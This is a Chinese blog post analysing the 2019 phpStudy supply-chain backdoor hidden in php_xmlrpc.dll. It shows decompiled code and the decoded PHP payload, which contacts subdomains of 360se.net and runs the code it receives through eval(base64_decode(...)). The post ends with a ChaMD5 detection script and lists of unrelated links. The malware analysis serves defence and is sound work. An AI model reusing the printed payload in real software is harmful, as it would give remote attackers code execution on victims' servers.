2019.9.20得知非官网的一些下载站中的phpstudy版本存在后门文件   说是官网下的就没有后门

20号出现的新闻 今天phpstudy官网21号又更新一波 不太好说这是什么操作哦 此地无银三百两?

很开心的说 我以前的虚拟机装的应该是有后门版本(任何文件我从来都是官网下文件)   用chamd5的检测py

哎~~学个php都被搞哦  跟着大佬团队文章也动手找找后门把

chamd5团队老哥发现是php_xmlrpc.dll中的问题 直接站人家肩膀把  看看这个dll

php_xmlrpc.dll @eval函数

.data:1000DE98

gzuncompress函数解密执行payload 以前webshell大马免杀经常用的函数- -

.data:1000DE98 函数sub_10003490

145-177行:

    while (  )

    {

      if ( *(_DWORD *)v13 ==  )

      {

        v10[v12] = ;

        v43[v12 + ] = *v11;

        v12 += ;

        v13 += ;

      }

      else

      {

        v10[v12++] = *v11;

        v13 += ;

      }

      v11 += ;

      if ( (signed int)v11 >= (signed int)asc_1000C66C )

        break;

      v10 = v43;

    }

    spprintf(&v43, , a_evalSS, aGzuncompress, v43);

    v24 = *(_DWORD *)(*a3 +  * executor_globals_id - );

    v25 = *(_DWORD *)(v24 + );

    *(_DWORD *)(v24 + ) = &v33;

    v40 = v25;

    v26 = setjmp3(&v33, );

    v27 = v40;

    if ( v26 )

    {

      v28 = a3;

      *(_DWORD *)(*(_DWORD *)(*a3 +  * executor_globals_id - ) + ) = v40;

    }

    else

    {

这里@eval    gzuncompress('%s')进行拼接,调用gzuncompress方法解密执行payload,以前webshell大马免杀经常用的函数,上面也看到了函数地址

而gzuncompress解密前的代码是这里的v43

下面是zend_eval_string处执行v43处gzuncompress编码的代码

    }

    else

    {

      v28 = a3;

      zend_eval_string(v43, , &byte_10011B34, a3);

    }

    *(_DWORD *)(*(_DWORD *)(*v28 +  * executor_globals_id - ) + ) = v27;

    if ( dword_1000C010 <  )

      dword_1000C010 += ;

    ftime(&dword_10011D50);

  }

v43处执行的代码通过解码:

@ini_set("display_errors","");

error_reporting();

$h = $_SERVER['HTTP_HOST'];

$p = $_SERVER['SERVER_PORT'];

$fp = fsockopen($h, $p, $errno, $errstr, );

if (!$fp) {

} else {

    $out = "GET {$_SERVER['SCRIPT_NAME']} HTTP/1.1\r\n";

    $out .= "Host: {$h}\r\n";

    $out .= "Accept-Encoding: compress,gzip\r\n";

    $out .= "Connection: Close\r\n\r\n";

    fwrite($fp, $out);

    fclose($fp);

}

拼接后v43后解密的代码 明显的fsockopen通信 反弹后门到360se.net的20123端口

@ini_set("display_errors","");

error_reporting();

function tcpGet($sendMsg = '', $ip = '360se.net', $port = ''){

    $result = "";

  $handle = stream_socket_client("tcp://{$ip}:{$port}", $errno, $errstr,);

  if( !$handle ){

    $handle = fsockopen($ip, intval($port), $errno, $errstr, );

    if( !$handle ){

        return "err";

    }

  }

  fwrite($handle, $sendMsg."\n");

    while(!feof($handle)){

        stream_set_timeout($handle, );

        $result .= fread($handle, );

        $info = stream_get_meta_data($handle);

        if ($info['timed_out']) {

          break;

        }

     }

  fclose($handle);

  return $result;

}

$ds = array("www","bbs","cms","down","up","file","ftp");

$ps = array("","","","","");

$n = false;

do {

    $n = false;

    foreach ($ds as $d){

        $b = false;

        foreach ($ps as $p){

            $result = tcpGet($i,$d.".360se.net",$p);

            if ($result != "err"){

                $b =true;

                break;

            }

        }

        if ($b)break;

    }

    $info = explode("<^>",$result);

    if (count($info)==){

        if (strpos($info[],"/*Onemore*/") !== false){

            $info[] = str_replace("/*Onemore*/","",$info[]);

            $n=true;

        }

        @eval(base64_decode($info[]));

    }

}while($n);

检查脚本 来自chamd5团队脚本,在phpstudy目录下执行即可递归检查

# -*- coding:utf8 -*-

__author__='pcat@chamd5.org'

__blog__='http://pcat.cc'

import os

import string

import re

def strings(file) :

    chars = string.printable[:94]

    shortestReturnChar = 4

    regExp = '[%s]{%d,}' % (chars, shortestReturnChar)

    pattern = re.compile(regExp)

    with open(file, 'rb') as f:

        return pattern.findall(f.read())

def grep(lines,pattern):

    for line in lines:

        if pattern in line:

            yield line

def pcheck(filename):

    # trojan feature

    trojan='@eval'

    # just check dll file

    if filename.endswith('.dll'):

        lines=strings(filename)

        try:

            grep(lines,trojan).next()

        except:

            return

        print '=== {0} ==='.format(filename)

        for line in grep(lines,trojan):

            print line

    pass

def foo():

    # . stand for current directory

    for path, dirs, files in os.walk(".", topdown=False):

        for name in files:

            pcheck(os.path.join(path, name))

        for name in dirs:

            pcheck(os.path.join(path, name))

    pass

if __name__ == '__main__':

    foo()

自己斟酌哦 太菜了呢学个php都给人家当鸡

2019关于phpstudy软件后门简单分析的更多相关文章

  1. 对魔兽世界、支付宝、Linux三类软件的简单分析

    软工第一次作业: 软件有很多种,如工具类软件.游戏类软件.系统类软件,它们的运行方式也各种各样,如以单机方式运行.以网站方式运行或者以APP方式运行在手机端等,请选取三种软件,分析它们各自的特点. 这 ...

  2. phpstudy后门POC分析和EXP开发

    POC 2019年9月20日,网上传出 phpStudy 软件存在后门,随后作者立即发布声明进行澄清,其真实情况是该软件官网于2016年被非法入侵,程序包自带PHP的php_xmlrpc.dll模块被 ...

  3. 一次对php大马的后门的简单分析

    有人分享了一个php大马(说是过waf),八成有后门,简单分析了一次 <?php $password='Shiqi';//登录密码(支持菜刀) //----------功能程序--------- ...

  4. Phpstudy隐藏后门

    Phpstudy隐藏后门 1.事件背景 Phpstudy软件是国内的一款免费的PHP调试环境的程序集成包,通过集成Apache.PHP.MySQL.phpMyAdmin.ZendOptimizer多款 ...

  5. CSipSimple 简单分析

    简介 CSipSimple是一款可以在android手机上使用的支持sip的网络电话软件,可以在上面设置使用callda网络电话.连接使用方式最好是使用wifi,或者3g这样上网速度快,打起电话来效果 ...

  6. java 中 “文件” 和 “流” 的简单分析

    java 中 FIle 和 流的简单分析 File类 简单File 常用方法 创建一个File 对象,检验文件是否存在,若不存在就创建,然后对File的类的这部分操作进行演示,如文件的名称.大小等 / ...

  7. Xshell高级后门完整分析报告

    Xshell高级后门完整分析报告 from:https://security.tencent.com/index.php/blog/msg/120 1. 前言 近日,Xshell官方发布公告称其软件中 ...

  8. phpStudy隐藏后门预警

    1.事件背景 近日,使用广泛的PHP环境集成程序包phpStudy被公告疑似遭遇供应链攻击,程序包自带PHP的php_xmlrpc.dll模块隐藏有后门,安恒应急响应中心和研究院随即对国内下载站点提供 ...

  9. CVE-2012-1876:Internet Exporter MSHTML.DLL CaculateMinMax 堆溢出简单分析

    0x01 2012 Pwn2Own 黑客大赛 Pwn2Own 是世界上最著名的黑客大赛,意在激励白帽黑客们进行顶尖的安全研究.在 2012 年 Pwn2Own 大赛上,来自法国著名的安全团队 Vupe ...

随机推荐

  1. SeekBar拖动条

    seekbar拖动条,通过滑块的位置值的改变,来对某些数据进行调节,比如音量调节; 改变滑块的外观可以通过android:thumb属性完成 实例:拖动滑块改变图片透明度 <LinearLayo ...

  2. Android入门学习教程PDF免费下载

    场景 CSDN: https://blog.csdn.net/badao_liumang_qizhi 博客园: https://www.cnblogs.com/badaoliumangqizhi/ 哔 ...

  3. 03 jvm的组成

    声明:本博客仅仅是一个初学者的学习记录.心得总结,其中肯定有许多错误,不具有参考价值,欢迎大佬指正,谢谢!想和我交流.一起学习.一起进步的朋友可以加我微信Liu__66666666 这是简单学习一遍之 ...

  4. JavaScript之操作符

    计算机被发明的初衷仅仅是为了快速实现一些数学计算,然而经过多年发展,计算机已经不单单能实现快速计算这么简单的工作了,现代计算机不仅能够进行数值的计算,还能进行逻辑计算,还具备存储记忆功能,是能够按照程 ...

  5. 设计模式笔记(一):Singleton 设计模式

    今天开始学习设计模式,借此机会学习并整理学习笔记. 设计模式是一门不区分语言的课程,什么样的编程语言都可以用到设计模式.如果说java语法规则比作武功招式的话,那么设计模式就是心法. 设计模式共有23 ...

  6. 第八届蓝桥杯java b组第五题

    标题:取数位 求1个整数的第k位数字有很多种方法.以下的方法就是一种. 对于题目中的测试数据,应该打印5. 请仔细分析源码,并补充划线部分所缺少的代码. 注意:只提交缺失的代码,不要填写任何已有内容或 ...

  7. SPSS基础学习方差分析—单因素分析

    为什么要进行方差分析? 单样本.两样本t检验其最终目的都是分析两组数据间是否存在显著性差异,但如果要分析多组数据间是否存在显著性差异就很困难,因此用方差分析解决这个问题:举例:t检验可以分析一个班男女 ...

  8. 使用Hexo开源博客系统,轻松搭建你的个人博客(2)- 配置篇

    上一章节,我们介绍了Hexo的基础搭建,搭建完大家一定发现,是英文版本的,并且页面有点丑陋.这一章节,就来跟大家介绍Hexo的配置和主题的设置. 站点信息 上一章有跟大家提到过_config.yml这 ...

  9. 2017CCSP-01 五子棋 简单模拟

    题面和数据 对于每个空格,先定义一个变量cnt=0,表示空格填充后对五子数量的变化,四个方向进行两边搜索,设对于每个方向连续的白棋子分别为\(wa\),\(wb\),有以下几种情况. \(wa> ...

  10. 1 Processing入门简介

    1 Processing入门简介 1.1 Before you start Processing是一个为开发面向图形的应用(visually oriented application)而生的简单易用的 ...